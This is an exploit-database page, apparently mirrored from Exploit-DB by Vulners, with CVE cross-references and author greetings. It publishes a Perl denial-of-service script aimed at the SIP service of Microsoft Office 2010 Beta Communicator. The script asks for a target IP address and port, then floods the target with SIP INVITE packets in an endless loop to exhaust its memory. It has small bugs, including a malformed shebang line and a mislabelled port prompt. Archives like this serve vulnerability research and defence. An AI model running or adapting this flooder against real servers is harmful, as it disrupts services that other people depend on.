Lucene search
+L

Microsoft Office 2010 Beta - Communicator SIP Denial of Service

🗓️ 06 Apr 2010 00:00:00Reported by indoushkaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 23 Views

Microsoft Office 2010 Beta Communicator SIP Denial of Service exploi

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
Microsoft Office Communicator (SIP) Remote Denial of Service Exploit
28 Nov 200800:00
zdt
circl
Circl
CVE-2008-5180
28 Nov 200800:00
circl
cve
CVE
CVE-2008-5180
20 Nov 200815:00
cve
cvelist
Cvelist
CVE-2008-5180
20 Nov 200815:00
cvelist
exploitdb
Exploit DB
Microsoft Office - Communicator 'SIP' Remote Denial of Service
28 Nov 200800:00
exploitdb
exploitpack
exploitpack
Microsoft Office - Communicator SIP Remote Denial of Service
28 Nov 200800:00
exploitpack
nvd
NVD
CVE-2008-5180
20 Nov 200815:30
nvd
packetstorm
Packet Storm
msoffice-dos.txt
29 Nov 200800:00
packetstorm
prion
Prion
Code injection
20 Nov 200815:30
prion
ptsecurity
Positive Technologies
PT-2008-6324 · Microsoft · Ge Communicator +1
20 Nov 200800:00
ptsecurity
Rows per page
========================================================================================
| # Title    : Microsoft Office ( 2010 beta ) Communicator SIP denial of service Exploit
| # Author   : indoushka
| # email    : [email protected]
| # Home     : www.iqs3cur1ty.com/vb
| # Tested on: windows SP2
| # Bug      : Denial of service Exploit
======================      Exploit By indoushka       =================================
 # Exploit  :

#!usr/bin/perl
#######################################################################################################################
#    Microsoft Office 2010 Communicator allows remote attack to cause a denial of service (memory consumption) via    #
#    a large number of SIP INVITE requests.                                                                           #
#######################################################################################################################


use IO::Socket;

print("\nEnter IP Address of Target Server: \n");
$vuln_host_ip = <STDIN>;
print("\nEnter IP Address of Target Server: \n");
$port = <STDIN>;

$sock_sip = IO::Socket::INET->new(    PeerAddr => $vuln_host_ip,
                                     PeerPort => $port,
                                     Proto    => 'udp') || "Unable to create Socket";
#if the server is configured on TCP replace 'udp' with 'tcp'.

while(1)
{
print $sock_sip "INVITE sip:arpman.malicious.com SIP/2.0\r\nVia: SIP/2.0/UDP 172.16.16.4;branch=123-4567-900\r\n";

}

#program never comes here for execution

close($sock_sip);

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R (http://www.ilegalintrusion.net/foro/)
Cyb3r IntRue (avengers team) * The globin * Virus_Hima
---------------------------------------------------------------------------------------------------------------

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Apr 2010 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
CVSS 3.15.3
EPSS0.67977
SSVC
23